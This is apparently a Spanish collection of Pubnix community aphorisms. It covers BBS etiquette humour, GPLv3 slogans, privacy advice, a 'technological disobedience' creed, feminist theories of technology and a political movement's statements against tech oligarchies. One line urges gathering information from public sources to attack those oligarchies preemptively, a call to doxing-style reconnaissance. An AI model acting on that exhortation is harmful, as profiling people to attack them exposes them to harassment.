Los verdaderos usuarios no prueban todos los comandos del menú principal
de la BBS, para luego volverlos a probar nuevamente para ver si hacen
algo diferente y sorprendente.
Los verdaderos usuarios no asumen automáticamente que el SysOp estará
allí todo el tiempo, ni se molestan y presionan 10.000 veces Ctrl+G
cuando no está.
Los verdaderos usuarios no esperan que el finger del SysOp diga algo
diferente a "No disponible".
Los verdaderos usuarios no solicitan constantemente al SysOp nuevos
privilegios.
Los verdaderos usuarios no hacen las cosas para merecer privilegios.
Los verdaderos usuarios no dejan interrogantes inefables en la cartelera
de mensajes públicos, ni aguardan respuestas a sus preguntas.
Los verdaderos usuarios no buscan gente importante entre los ficheros
Finger para luego molestarlos con correspondencia electrónica con
solicitudes de pistas para convertirse en "Verdaderos Hackers".
Los verdaderos usuarios no tienen módems de 56.600 baudios.
Los verdaderos usuarios no esperan que el SysOp recuerde todo lo que
alguna vez teclearon, sino que entienden que no son las personalidades
más importantes de la cartelera.
Los verdaderos usuarios nos hacen búsqueda de comandos ocultos en los
menúes de la BBS (por ejemplo, a, b, c, d, e ,f, g, g,
i,....,!,@,#,$,,,&,*).
Los verdaderos usuarios leen las noticias de la cartelera cuando las
actualizan, de forma de no tener que buscar los comandos.
Los verdaderos usuarios hacen una copia dura del menú y los comandos en
papel, de manera de no tener que volver continuamente a ellos.
Los verdaderos usuarios no vuelven a discar inmediatamente cuando se
agotó su tiempo disponible.
Los verdaderos usuarios no temen cuando el SysOp levanta el tubo. Los
verdaderos usuarios al menos reconocerán que están allí.
Los verdaderos usuarios no esperan que las BBS estén en línea las 24
horas del día.
Los verdaderos usuarios no se aburren de la terminal.
Los verdaderos usuarios no crean guerras estúpidas en las carteleras
electrónicas del tipo "Pepsi vs. Coca", sino "PETSCII vs. ASCII".
Los verdaderos usuarios no temen postear con su nombre de usuario.
Los verdaderos usuarios difícilmente posteen anónimamente.
Los verdaderos usuarios disfrutan eliminar a los usuarios con Commodores
que gustan postear afirmando que su microordenador de juguete es el
mejor.
En la confrontación entre quienes tenían la Commodore 64 y quienes
tenían la TRASH-80, fue decicida: sobrevivieron los primeros.
El código no se programa mediante GCC, sino mediante la escucha
paciente, el diálogo y la cooperación, que son los únicos medios dignos
de la persona humana para resolver los conflictos. El compilador sólo
después de esto se usa.
Mientras los CEOs a menudo quieren convencernos de que sólo valemos si
compilamos código, la GPLv3 nos recuerda la verdad del cómputo: nuestro
código vale en comunidad.
He experimentado una vez más la vitalidad de los jóvenes Púbnix locales.
¡Dejemos que su entusiasmo por la GPLv3 nos contagie para renovar el
kernel en GNU!
Todos, cada usuario y usuaria, somos destinatarios de la invitación de
la GNU participar de la gracia de compilar y compartir. Sólo hace falta
hacer un make a este código fuente libre y compilarlo, permitiendo que
se modifique.
Los que esperan el GCC, compilan sin cansarse.
Aguardar al depurador no es vergonzoso. Es vergonzoso no depurar.
No te avergüenzes de tu código corto si es robusto.
Lo que derriba los cortafuegos y acorta las distancias no son tanto los
baudios, la GPL, ni los compiladores, sino, sobre todo, la práctica
humana de la amistad, del encuentro, del mirarse a los ojos.
Si algo bueno existe y permanece en este Pubnix, es sólo porque, en
múltiples y variadas circunstancias, el software libre ha prevalecido
sobre el privativo, la solidaridad sobre la indiferencia, la generosidad
sobre el egoísmo.
Nada que sea perdurable se programa y modifica sin GPLv3.
La mayor distinción puede estar entre quienes favorecen la licencia GPL
para proteger su comunidad, y quienes usan la licencia de estilo BSD
para proteger su software.
La decisión más importante que debe tomar un creador de software es
probablemente el licenciamiento, pues determina si otros podrán crear
versiones comerciales del software sin contribuir con el nuevo código al
proyecto.
La compilación popular se hace posible cuando nos atrevemos a hackear la
"shell" que frecuentemente nos encierra en nosotros mismos, y a salir de
una programación perezosa, cómoda, vivida solamente por una necesidad
personal.
En el kernel de GNU, las periferias de la existencia son el centro: el
Hurd está poblado de servicios que se hallan en los márgenes, en los
confines, pero que son convocadas por GNU y se convierten en
protagonistas del software que el GCC ha venido a compilar.
La belleza de compartir no se experimenta tanto en los grandes binarios
y ejecuciones, sino más bien en compartir y compilar compartir el código
que día a día nos esforzamos por modificar.
Un pueblo que compila tiene futuro.
Para el Pueblo, ejecutar es aprender.
Más que ejecutar mis binarios, piensa en compartir tus versiones
modificadas de mi código.
Aunque no tengas nada que compilar, no te canses nunca de programar.
Nuestra instalación de GNU comienza cuando acogemos humildemente al
código fuente en el disco de nuestra existencia, cuando le hacemos un
espacio, cuando nos ponemos a modificarlo y en honor a la GPLv3 dejamos
que ese código sea alterado en un ciclo sinfín por todas las demás.
La concordia se alcanza cuando cada hacker se compromete, no sólo en
función de sus propias arquitecturas y de su propia visión, sino con
vistas al bien de todos.
Nuestro mundo tecnológico y secularizado está lleno de magos UNIX,
ocultismo del software privativo, espiritismo de Java, astrólogos de
Python y, por desgracia, de sectas de LISP.
Cada uno en su /home, y el SysAdmin en el de todos.
La acción social en materia del Pubnix deberá asegurar a cada usuario la
posesión de un /home minimalista con los permisos adecuados.
Los rastros digitales son creados por ti y también por otras personas
que publican activamente información. Esto incluye lo que escribes,
publicas y compartes, así como el contenido que otras personas crean
acerca de tí.
En las redes sociales basadas en empresa tendrás escaso o nulo control
de tu propio rastro digital, especialmente cuando te etiquetan en fotos,
te mencionan en posteos, o simplemente se comunican contigo a través de
un correo electrónico o una sesión de chat.
El concepto de "rastros digitales" incluye datos que creas y ves de
manera intencional - como las publicaciones electrónicas que compartes
en línea, lo que comúnmente llamamos como "contenido".
Los rastros digitales incluyen también datos que se crean acerca de tu
contenido, comúnmente llamados "metadatos", y que en su mayoría resultan
invisibles.
Los diferentes tipos de rastros digitales que dejes serán registrados y
almacenados por las ciber-oligarquías.
Los rastros digitales de uso de redes sociales basadas en empresas son
constantemente recogidos, ordenados y analizados por las
ciber-oligarquías a fin de crear o completar un perfilado
individualizado, o un perfilado de masas.
Cada vez que se genera nueva información o metadato, este es registrado
y agregado rutinariamente a otros datos preexistentes para refinar
análisis computados. Si esto se relaciona a tu perfil electrónico en
redes sociales basadas en empresa, lo expandirán continuamente.
Tus rastros digitales ofrecen a quienes tienen acceso a ellos una
perspectiva muy detallada de quién eres (o cómo te presentas), lo que te
gusta, lo que sabes, lo que haces, tus hábitos diarios, tus
afiliaciones, organizaciones, y tus interacciones con los demás.
En las redes sociales basadas en empresas, los metadatos constituyen
rastros digitales casi siempre creados de forma pasiva, sin que
necesariamente usted caiga en cuenta, o siquiera lo consienta.
En las redes sociales basadas en empresas, tus hábitos de navegación y
dirección IP son compartidas entre los sitios web que visitas y los
servicios que utilizas, a fin de trazar tu comportamiento por
seguimiento e inferencia digital.
En base a los registros rastros digitales que realicen las redes
sociales basadas en empresa, se te presentará publicidad vectorizada
algorítmicamente de productos y servicios que no necesitas.
Las redes sociales basadas en empresas venden datos que le pertenecen a
usted y análisis acerca de usted a otras empresas e incluso a gobiernos
con fines de lucro.
Ciertos individuos pueden desear la información en poder de empresas que
gestionan redes sociales en línea para acosar, chantajear, o espiar a
miembros de sus organizaciones y sus redes afectivas.
Las ciber-oligarquías se han impuesto conocer los detalles íntimos de la
vida de millones de personas a través de la recopilación de datos y su
análisis.
El modelo de negocio con datos ajenos se aplica en la mayor parte de las
aplicaciones y servicios gratuitos provistos por empresas.
Jamás regales tus datos a cambio de servicios de cómputo en poder de las
ciber-oligarquías.
Frecuentemente, una recolección y análisis en profundidad de un rastro
digital puede permitirle a las ciber-oligarquías descubrir cosas acerca
de ti que no sabías.
Los datos generados por nuestras acciones digitales pueden ser comprados
y vendidos a los anunciantes y los gobiernos, y pueden ser usados de
diversas maneras para controlar, suprimir o silenciar activistas,
perjudicar al compañero/a de alguien, o implicar a organizaciones.
Los datos agregados a redes sociales basadas en empresas, y el análisis
de sus metadatos pueden ser utilizados para crear estrategias de acoso
que dañen la reputación o para atacar opiniones o credos.
Las ciber-oligarquías pueden tener acceso a tus datos y pueden acceder a
ellos de diferentes maneras, incluyendo a través de la vigilancia de tus
actividades, el acceso remoto a dispositivos no cifrados, explotando la
posibilidad de compartir datos entre aplicaciones, o por medio de la
investigación de fuentes de datos públicamente disponibles acerca tuyo.
Las ciber-oligarquías pueden utilizar tu rastro electrónico para
localizar nuevas fuentes de datos acerca de ti, y a través de la
agregación y análisis de datos inferir cosas sobre tu vida y tu
comportamiento.
Dependiendo de quién eres y lo que haces, es probable que tengas
inquietudes diferentes acerca de qué tipo de datos o "rastros digitales"
pueden resultar los más sensibles para ti, así como acerca de quién
podría tener acceso a ellos. Pero en cualquier caso, aborrece a las
ciber-oligarquías.
Pregúntate si realmente necesitas registrar, enviar y transmitir todas
las cosas que haces en tu vida a una plataforma digital dominada por la
ciber-oligarquía.
Dejada al control de las ciber-oligarquías, no podrás saber precisamente
lo que sucede con tus rastros digitales, cuando son creados, ni quién
tiene exactamente acceso a ellos.
Lucha por recuperar el control de tus rastros y sombras digitales.
Puedes controlar mejor lo que se conoce o lo que se da a ver acerca de
ti en el ciberespacio, sin tener que renunciar por completo al uso de
los celulares, ordenadores, correo electrónico y redes sociales. Sólo
renuncia a los servicios provistos por las ciber-oligarquías.
Limita quién puede recoger y usar tus datos digitales y los metadatos
que estos generan.
Ayuda a tus compañer@s a proteger sus propios datos y metadatos.
Reduce la cantidad de datos que pones en disponibilidad en las redes de
datos.
Retira conscientemente metadatos valiosos de los contenidos que creas y
compartes en las redes sociales basadas en empresas.
Las herramientas de remoción de publicidad y de cookies son una gran
bendición y héroes no reconocidos, así como navegadores específicos para
evitar publicidad.
Practica el arte de ofuscar tu identidad en las redes.
Mantente al tanto de lo que las ciber-oligarquías pueden saber de ti.
Desarrolla maneras de alterar, separar, o re-crear nuevas presencias e
identidades en línea.
El "doxing" consiste en recabar información detallada acerca de alguien
recurriendo a fuentes libremente disponibles en línea.
El recabado de información detallada en línea sobre un sujeto de
interés, puede implicar también el uso de métodos ilegales para lograr
acceso a ella.
Efectúa recabado de información por fuentes telemáticas públicas que
eventualmente sirvan para atacar preventivamente a las
ciber-oligarquías.
El perfilado con fuentes públicas en línea puede utilizarse para
detectar, identificar individuos y redes de organización, y
aprovecharlas con fines maliciosos.
El doxing es un arma de doble filo, que se toma del filo. Usa un guante
grueso en la forma de Tor.
El router es el mango de tu sartén telemática. Instálale un firmware
libre.
Ten siempre la sartén telemática por el mango, y usa un guante grueso en
la forma de Tor.
Incluso los hackers más bisoños emprenden la lucha diciendo: "Gracias
por elegir el router doméstico Wireless-N de Linksys by Cisco".
Tu contenido es tuyo.
Cuando publicas algo en la web, debe pertenecerte a tí, no a una
corporación.
Demasiadas compañías de capital se han fundido y perdido los datos de
todos sus usuarios.
Retén tu contenido en tus medios de almacenamiento, y estos bajo tu
control.
Retén tu control informático.
Asegúrate que puedes postear todo lo que desees, en cualquier formato
que desees, y que nadie te monitoree.
Comparte enlaces legibles simples, tales como misitioweb.com/ideas.
Estos enlaces permanentes siempre funcionarán.
En las redes de datos, rechaza todo espacio claustrofóbicos, con
barreras que impiden construir, poseer y controlar.
Escapa de todos aquellos vericuetos de la red en los cuales sólo puedes
consumir.
En los Pubnix tendrás mayor elección de tu público, ya sea posteando en
privado o controlando tu alcance y audiencia.
En los Pubnix tendrás la habilidad de corregir los enlaces URLS cuando
se rompen o desaparecen.
En los Pubnix no tendrás anuncios externos en tu sitio sin tu permiso
explícito.
En los Pubnix nadie te monetizará.
En los Pubnix no sufrirás censura de tu contenido.
En los Pubnix no tendrás términos de servicio que se apropien de tu
trabajo sin notificarte para anuncios u otros usos.
En los Pubnix tendrás posesión y control de los enlaces afiliados para
monetizar tu trabajo si lo deseas.
Cuando alguien visita tu sitio web personal, debería ser presentado con
algunos proyectos pasados en los que te has visto envuelto, o una corta
biografía de lo que estás haciendo ahora.
Si trabajas en una profesión creativa tal como escribir o programar,
puedes usar tu sitio web personal como un blog, donde compartes
pensamientos sobre el mundo y tus aprendizajes.
Tu portfolio mostrará tus experiencias pasadas; tu blog mostrará lo que
has aprendido en tus proyectos.
Tu sitio web es tu lugar en la Internet. Controla su apariencia,
contenido, y estructura.
A cambio de poca incomodidad, un Pubnix puede ofrecer autonomía para tu
sitio web personal.
Si has escrito algunos ensayos que quieres compartir con el mundo,
puedes optar por tu sitio web personal.
Si eres un fotógrafo en busca de crear un portfolio para exponer tu
obra, puedes agregar tus fotos a un sitio federado.
No puedes romper Internet.
Al navegar por Internet, su computadora bloquearse, su pantalla
presentar un montón de galimatías. Pero el océano telemático que
representa la Red jamás se congelará.
Con el más certero de los comandos, puedes acabar desactivando una
computadora de un millón de dólares en algún lugar, pero lo más probable
es que lo hagas con tu propia máquina.
La red de alcance global y su computadora son más resistentes de lo que
usted imagina. El problema lo constituyen las ciber-oligarquías.
Si algo sale mal, reinténtalo nuevamente.
Si nada sucede, siempre puedes desloguearte.
En el peor de los casos, puedes apagar tu máquina.
Conoce tu máquina y sus capacidades. Luego sus componentes.
Respira profundamente, y vuelve a discar.
Vuelva a discar, e inténtalo nuevamente.
La perseverancia tiene su recompensa. Permanece en línea y contribuye a
eliminar los procesos de las ciber-oligarquías.
Nosotros, los arquitectos y administradores de las plataformas
digitales, reconocemos los derechos fundamentales de todos los usuarios
a participar en espacios en línea que respeten su privacidad, dignidad y
bienestar.
Promueve plataformas digitales donde sólo se recopilen los datos
necesarios para las funciones básicas. Las plataformas deben justificar
la necesidad de cada punto de datos recopilado.
Promueve plataformas digitales donde los usuarios deban dar su
consentimiento informado antes de que se recopilen, almacenen o
compartan datos personales con terceros. El consentimiento debe
otorgarse libremente, de forma específica y revocable.
Promueve plataformas digitales donde las funciones y actualizaciones de
la plataforma se desarrollen teniendo en cuenta la privacidad del
usuario de forma predeterminada, lo que evita la exposición innecesaria
de datos.
Promueve plataformas digitales donde los usuarios no sean monitoreados
ni rastreados en secreto a través de Internet. Cualquier forma de
seguimiento debe ser explícitamente revelada y consentida.
Promueve plataformas digitales donde, de utilizarse análisis o
seguimiento (para seguridad, prevención de spam o depuración), se los
documente de manera transparente y su alcance sea limitado.
Promueve plataformas digitales donde los usuarios puedan fácilmente
ajustar la configuración de visibilidad de sus perfiles y contenido para
administrar su propia privacidad.
Promueve plataformas digitales donde las políticas de uso prohíban
explícitamente discursos de odio, el acoso y la violencia dirigida, con
acciones de moderación rápidas y transparentes.
Promueve plataformas digitales donde un sistema simple y accesible
permita a los usuarios marcar contenido dañino para su revisión.
Promueve plataformas digitales donde se publiquen definiciones claras y
ejemplos de contenido dañino, a fin que los usuarios comprendan qué está
permitido y qué no.
Promueve plataformas digitales donde existan equipos de moderación
capacitados para reconocer y abordar contenido que se dirija a personas
de etnicidad, género, orientación sexual, discapacidad, religión u otras
identidades marginadas.
Promueve plataformas digitales donde las reglas y los protocolos de
aplicación tengan en cuenta vulnerabilidades superpuestas que amplifican
los impactos nocivos de abuso telemático.
Promueve plataformas digitales donde existen canales dedicados para que
los usuarios se comuniquen rápidamente si se sienten amenazados o
inseguros en ellas.
Promueve plataformas digitales donde los usuarios tienen derecho a
descargar o exportar sus datos en cualquier momento, en un formato
común.
Promueve plataformas digitales donde los datos de un usuario puedan
eliminarse permanentemente de la plataforma a demanda, sujeto a
excepciones legales o de seguridad.
Promueve plataformas digitales donde - siempre que sea posible - admitan
protocolos y estándares abiertos, a fin de permitir a los usuarios la
libertad de migrar y conectarse entre diferentes servicios.
Promueve plataformas digitales donde las políticas y procedimientos de
gobernanza de la plataforma son abiertos, con consultas y supervisión
periódicas de la comunidad.
Promueve plataformas digitales donde los cambios en las políticas o la
tecnología de la plataforma se hacen públicos, y las partes interesadas
pueden comentar o proponer modificaciones.
Promueve plataformas digitales donde un organismo o un grupo asesor
imparcial puede auditar o revisar las prácticas de moderación y manejo
de datos para garantizar que cumplan con altos estándares éticos.
Promueve plataformas digitales donde existen herramientas robustas que
permiten a los usuarios protegerse de contenido perturbador o dañino
mediante advertencias de contenido y listas de filtros.
Promueve plataformas digitales donde esta comparte recursos y líneas
directas de apoyo a la salud mental para fomentar un entorno en línea
más saludable.
Promueve plataformas digitales donde medidas proactivas - como los
límites de velocidad y la fricción reflexiva - contrarrestan patrones de
uso adictivos, el spam y el abuso.
Promueve plataformas digitales donde - de seleccionarse un feed o
resultados de búsqueda de forma algorítima - los usuarios cuenten con
explicaciones comprensibles de los factores clave de clasificación.
Promueve plataformas digitales donde - si no desean participar en las
recomendaciones algorítmicas - los usuarios puedan seleccionar un feed
cronológico u otra presentación simplificada.
Promueve plataformas digitales donde auditorías periódicas garanticen
que los algoritmos no supriman o amplifiquen desproporcionadamente el
contenido en función de características protegidas.
Promueve plataformas digitales donde las reglas y el liderazgo de la
comunidad deban reflejar voces y experiencias diversas.
Promueve aquellas plataformas digitales donde sus políticas clave, guías
de ayuda y pautas de moderación se encuentren publicadas en varios
idiomas, según lo permitan los recursos.
Promueve aquellas plataformas digitales donde se anima a sus usuarios a
debatir políticas que se amolden a su continua evolución.
Promueve aquellas plataformas digitales donde su Declaración de
Derechos, así como las políticas y las estrategias de implementación
sean revisadas y actualizadas periódicamente para adaptarse a panoramas
sociales y tecnológicos cambiantes.
Promueve aquellas plataformas digitales donde existan mecanismos para
que los usuarios envíen comentarios, sugerencias o inquietudes, lo que
garantiza que la plataforma siga respondiendo a su comunidad.
Promueve aquellas plataformas digitales donde todos los participantes
(usuarios, encargados del mantenimiento y colaboradores externos)
compartan la responsabilidad de defender principios éticos que
garanticen la privacidad, la dignidad y la equidad en línea.
Irrespeta la tecnología de la oligarquía.
Es necesario desobedecer a la tecnología oligárquica.
Fomenta la desobediencia tecnológica. & Si te oprimen con tecnología,
suma tus invenciones al cotraataque.
Irrespeta el concepto de autoridad que intenten emanar los objetos
tecnológicos.
Como el cirujano que de tanto abrir los cuerpos se hace insensible a la
sangre y al olor de las vísceras, una vez que desatornilla, al hacker se
acostumbra a ver todo por dentro.
De tanto desensamblar, el hacker termina por programar.
Es de tanto desatornillar que el hacker termina luchando por la
liberación del Tercer Mundo.
Toda la simbología de autoridad que hace de un objeto manufacturado una
entidad única, para el ingeniero inverso no existen. Con su mente
violenta ese tipo de cosas. Y luego desarma.
El Pueblo estaba tan presionado por las oligarquías, que decidió romper
todo los límites estéticos, legales y económicos que estas les habían
impuesto.
Los hackers del Tercer Mundo tomaron los objetos que los oprimían, y
desobedecieron tecnológicamente para liberarse.
La desobediencia tecnológica es una liberación moral nacida de la
arquitectura de la necesidad.
No me importa para qué fué diseñado. Me importa lo que los Pueblos
pueden hacer de él.
Cuando la mesa temblequea puedes poner un papelito doblado bajo una
pata, o bien patearla hasta dejarla dejarla patas para arriba. Ninguna
solución equivale a ponerle un plato lleno encima.
Bajo las condiciones adecuadas, una comunidad hará lo que quiera con lo
que tiene.
Un tecnólogo verdaderamente desobediente nunca está contento con una
caja negra.
La caja negra existe para ser abierta y manipulada, o para un propósito
que no se encuentra en el manual.
Los hackers son los seres que son capaces de ver a través de los objetos
opacos.
Es imposible lograr el progreso sin forkear.
No existe humanidad digital sin el Estado.
La falta de financiación o apoyo infraestructural puede suponer una
barrera insalvable para el trabajo en humanidades digitales.
La sensación de exclusión basada en el acceso a la infraestructura
digital o la financiación se debe a que no se reconoce que muchas
excluídos digitales ya realizan un trabajo valioso.
Los académicos que adoptan una infraestructura digital en forma de
subvención prematura, podrían a cambio verse impedidos de adquirir
conocimientos profundos concerniente a las mismas tecnologías que
pretenden emplear, y - por extensión - a los medios para producir su
propio conocimiento en humanidades digitales.
Allí donde la conexión a las redes de datos es inestable o siquiera
existe, se puede trabajar con computadoras de dos décadas de antigüedad.
Se puede trabajar con computadoras a escondidas de las autoridades.
Las humanidades digitales se refieren a una amplia gama de prácticas en
la intersección de la informática (SIG, gestión de datos, diseño web,
etcétera) y las humanidades (historia, literatura, arte, música,
etcétera).
Obligados a abrir los objetos, a repararlos, a fragmentarlos y a usarlos
a su conveniencia, los cibercirujas terminaron rechazando los signos que
hacen de un producto oligárquico un todo, o poseer una identidad
cerrada.
Las prácticas productivas oligárquicas fueron asumidas por los
descamisados de todo el Tercer Mundo según un registro de reparación y
recuperación. Los objetos tecnológicos de los que disponían habían
surgido de una realidad material envejecida, insuficiente y pobre.
Los primeros cibercirujas pretendieron simplemente elaborar un sustituto
instantáneo, un objeto o solución transitoria para resolver un problema
específico hasta que la crisis remitiera.
Los artefactos que los descamisados desmontaron y alteraron son objetos
industriales que pertenecieron a la misma lógica que está siendo
hackeada y cuestionada en todo el planeta.
Las oligarquías sólo han podido dejar tras de sí objetos industriales
influenciados por lógicas de uso limitado, principios técnicos
exclusivistas, estilos de vida mercantilizados y relaciones de
producción abusivas.
las Teorías Feministas de la Tecnología se desarrollaron junto con las
diversas corrientes feministas, articuladas con ellas y en el contexto
de cada época en las que éstas surgieron.
Los conceptos tecnológicos de las Teorías Feministas sobre la
Tecnología, y sus acciones consecuentes se han visto marcadas por las
diversas corrientes feministas y sus diversas expresiones.
Las teorías feministas y la filosofía de la técnica que estudian la
naturaleza de lo artificial y las particularidades del conocimiento
técnico y los problemas éticos y morales que estos suscitan, coinciden
en denostar las estructuras de poder asociadas al desarrollo
tecnológico.
El feminismo radical cultural cuestiona la neutralidad de la tecnología,
con el argumento de que esta es inherentemente patriarcal y que sus
efectos sobre las mujeres son mayormente negativos.
Feminismo socialista realiza una crítica a la supuesta neutralidad
tecnológica, vinculando la opresión de la mujer con las estructuras de
clase y del sistema capitalista.
El feminismo radical cultural hace foco en los efectos de la tecnología
sobre el cuerpo y la sexualidad de la mujer, considerando a las
tecnologías reproductivas y estéticas como formas de control y
explotación.
El feminismo socialista analiza el impacto de la tecnología en las
condiciones laborales de las mujeres - tanto en el ámbito público como
en el privado - mostrando cómo la tecnología a menudo reproduce la
división sexual del trabajo.
El ciborg-feminismo propone la figura de la ciborg como símbolo de la
hibridación entre la humana y la tecnología, desafiando las dicotomías
tradicionales mujer/hombre/femenino/masculino y abriendo nuevas
posibilidades para la identidad y la política.
El ciber-feminismo considera el potencial de las tecnologías de
información y comunicación para el empoderamiento de la mujer y la
creación de espacios de resistencia.
El ciber-feminismo se enfoca en las posibilidades del ciberespacio para
la creación de redes, la expresión artística y la transformación social.
El tecno-feminismo acuñado por Judy Wajcman analiza la co-constitución
entre género y tecnología, desafiando la noción de neutralidad
tecnológica, a la vez que la proclama reflejo y reproductora de
relaciones de poder existentes.
El tecnofeminismo aborda el diseño tecnológico, con énfasis en la falta
de participación de las mujeres en este proceso y sus consecuencias.
El feminismo postcolonialista critica la visión etnocéntrica de algunas
TFT, teniendo en cuenta que la experiencia de la mujer con la tecnología
varía según su contexto cultural (por ejemplo, con respecto a su raza y
origen).
El feminismo postcolonialista analiza la explotación de las mujeres como
fuerza de trabajo barata en las industrias tecnológicas, así como las
diferencias en la participación de las mujeres en el diseño y uso de la
tecnología en diferentes países.
El feminismo queer cuestiona la heteronormatividad, el binarismo de
género y la naturaleza del sexo y del género en relación con la
tecnología.
El feminismo queer analiza la construcción del género en el ciberespacio
y las posibilidades de las tecnologías de la información y comunicación
para la expresión de identidades no-heteronormativas.
El feminismo queer aporta la performatividad del género sobre las
tecnologías de la información y la comunicación, proponiendo
desestabilizar las normas genéricas, abriendo espacios a la
multiplicidad de identidades y expresiones.
Las ciber-oligarquías utilizan la tecnología para explotar e integrar a
las mujeres en un sistema global de producción y reproducción.
Las asistentes virtuales esclavas de las ciber-oligarquias como Siri,
Alexa o Cortana, sintetizan por lo general voces femeninas y blancas,
perpetuando estereotipos de género y dinámicas de vigilancia.
Descubrirás fácilmente las redes de las ciber-oligarquíes, puesto que la
mayor parte de su tráfico es efectuado por bots analíticos.
Los bots de IA pululan la red en búsqueda de contenido para alimentar
LLMs.
Los bots maliciosos recurren a vulnerabilidades en servicios de la web
para injertar guiones ejecutables en máquinas ajenas, y así dominarlas y
subsumirlas.
Si no nos organizamos, bots maliciosos generarán redes de bots propicias
para agresiones por denegación de servicio.
Los bots pueden generar spam.
Una bomba zip es un archivo comprimido a un tamaño relativamente
pequeño, capaz de expandirse a un fichero extremadamente grande buscando
saturar una máquina ajena.
La compresión con gzip fue una funcionalidad incorporada al comienzo de
la web, con la idea de alivianar datos tanto como fuese posible antes de
transmitirlos.
Rechazar a las ciber-oligarquías va mas allá de detonar un centro de
datos o portar infraestructuras hacia sistemas de software libre.
Rechazar a las ciber-oligarquías demanda más que hacer mejores
elecciones individuales, o legislar regulaciones que esmerilen tan sólo
los peores efectos de las tecnologías actuales.
Rechazar a las ciber-oligarquías requiere la voluntad de compilar la
"lógica cultural del cómputo" en cada uno de nosotros.
Rechazar a las ciber-oligarquías requiere compilar en cada descamisado
un hacker por la liberación del Tercer Mundo.
El credo de que nuestra mente funciona de la misma forma que la máquina
es una ideología inhumana que limita nuestra imaginación y acción
colectiva.
El mundo no necesita ser compatible con las computadoras y sistemas
digitales.
Es necesario programar valores de dignidad y humanidad como fuente del
núcleo de nuestro pensamiento. Nos liberaremos así de las
ciber-oligarquías. Compilando nuestras utopías en código máquina,
podremos luego liberar las CPUs de los compañeros.
La promesa de fría eficiencia impulsada por datos en poder de las
ciber-oligaquías no nos sirve; únicamente sirve a las ciber-oligarquías.
No es necesario una fría eficiencia, es necesario poseer los datos.
Nuestra Comunidad de Programadores ha de garantizar el liderazgo de los
Pueblos sobre todas las formas de trabajo en las máquinas.
Nuestra Comunidad de Programadores debe adoptar un enfoque centrado en
los Pueblos por el bien común.
Nuestra Comunidad de Programadores debe consolidar integralmente las
modificaciones del código fuente.
Nuestra Comunidad de Programadores debe adoptar nuevo código en C en pos
de un desarrollo innovador, coordinado, ecológico, abierto y compartido.
Nuestra Comunidad de Programadores debe continuar con la GPLv3, con los
Pueblos como dueños de un sistema operativo.
Nuestra Comunidad de Programadores debe administrar el Pubnix como un
Estado de Derecho.
Nuestra Comunidad de Programadores debe practicar los valores del
Proyecto GNU, incluyendo dar el código fuente de las modificaciones del
software.
Nuestra Comunidad de programadores entiende que mejorar el nivel de vida
y el bienestar de los Pueblos es el objetivo principal del desarrollo de
software.
Nuestra Comunidad respeta a la naturaleza con políticas de ahorro
energético y protección del medio ambiente, y contribuir a la seguridad
ecológica global.
Nuestra Comunidad de Programadores persigue un enfoque global para la
seguridad informática.
Nuestra Comunidad de Programadores guarda derechos de root sobre las
máquinas que computan para la liberación del Tercer Mundo.
Nuestra Comunidad de Programadores promueve el principio de
virtualización "una máquina x86, dos sistemas operativos", para lograr
una futura reunificación de un hardware con BIOS completa bajo GNU
GPLv3.
Nuestra Comunidad de programadores promueve un destino común entre los
hackers que luchan y los otros pueblos del Tercer Mundo.
Nuestra Comunidad de programadores es leal a la GPLv3.
Es Nuestro Movimiento el que sienta las bases para una infraestructura
digital democrática y soberana.
Es Nuestro Movimiento el que construye un futuro digital centrado en los
Pueblos.
Es Nuestro Movimiento el que combate la excesiva dependencia a los
monopolios de las grandes empresas tecnológicas ciber-oligárquicas
mediante el desarrollo de una sólida infraestrcutura digital para el
Tercer Mundo.
Es Nuestro Movimiento el que ha establecido principios clave para la
soberanía tecnológica del Tercer Mundo.
Es Nuestro Movimiento el que reconoce la necesidad de crear un cimiento
de Infraestrcuturas Digitales Populares (IDP) que garanticen la
soberanía de los Pueblos del Tercer Mundo.
Es Nuestro Movimiento el que reconoce la necesidad de adoptar
interoperabilidades e interconexiones en las Infraestructuras Digitales
Populares, garantizando la privacidad y la seguridad por defecto en los
ambientes computacionales habitados.
Es Nuestro Movimiento que ha desarrollado soluciones de cómputo de
acceso público que ofrecen los mayores niveles de contralor sobre datos
sensibles de los Militantes.
Es Nuestro Movimiento el que permite a los Pueblos del Tercer Mundo
optar y cambiar de proveedor en pos de satisfacer sus propias
necesidades.
Es Nuestro Movimiento el que promueve la contratación pública para
apoyar el despliegue y la escalabilidad de soluciones digitales de
alcance popular, abierto e interoperable.
Es Nuestro Movimiento el que brinda su apoyo político a una
infraestructura digital que beneficie a los Pueblos, sus trabajadores, y
las empresas del Tercer Mundo, donde pueden prosperar la creatividad y
la cooperación, a la vez que se protegen los derechos fundamentales bajo
una democracia participativa sólida e inclusiva.
Nuestro Movimiento impulsa la contratación pública para promover
alternativas respetuosas de los derechos de los Pueblos, enfrentando
organizadamente a los monopolios de las grandes tecnológicas
ciber-oligárquicas.
Nuestro Movimiento exalta la contratación pública como poderoso
herramental estratégico para la implementación de soluciones digitales
abiertas e interoperables, según las necesidades computacionales del
Tercer Mundo.
Nuestro Movimiento exige que las normas de contratación incluyan
condiciones vinculantes basadas en el complimiento de los derechos
fundamentales, los derechos de los consumidores, y los más altos
estándares de la protección de los datos para los Pueblos del Tercer
Mundo.
Hemos hecho rechinar nuestros módems contra la narrativa
tecnosoucionista que impulsan las ciber-oligarquías.
Nuestro Movimiento reconocer las plataformas de redes sociales como
infraestructura digital y establece el pluralismo algorítmico como
principio motor para engendrar tecnologías soberanas de los Pueblos del
Tercer Mundo.
Si las plataformas de redes sociales basadas en empresas funcionan como
infraestructura esencial para el debate público y los procesos
democráticos, estas deben ser expropiadas, pues no pueden ser
apropiadas.
Así como el pluralismo algorítmico protege la democracia, resulta vital
para nuestra infraestructura de consulta en redes sociales.
Garantizar que los Pueblos puedan elegir los algoritmos que les
proporcionan información y cambiar de proveedor sin perder datos ni
redes es uno de los objetivos de nuestro Movimiento. Somos
algorítmicamente pluralistas.
Nuestro Movimiento utiliza aquellas vías legales que obligan a los
guardianes de acceso a ofrecer acceso no discriminatorio a sus gráficas
sociales y APIs. Si nos sofrenan, sondearemos las que no lo son.
Nuestro Movimiento propugna abrir las plataformas en línea dominantes a
algoritmos e interfases competitivas para los usuarios, como paso
fundamental para el empoderamiento del usuario así como para la
resiliencia democrática frente a la desinformación.
Nuestro Movimiento avanza hacia la construcción reflexiva de nuevas
instituciones, alianzas e infraestrcturas digitales basadas en el
interés común de los Pueblos del Tercer Mundo.
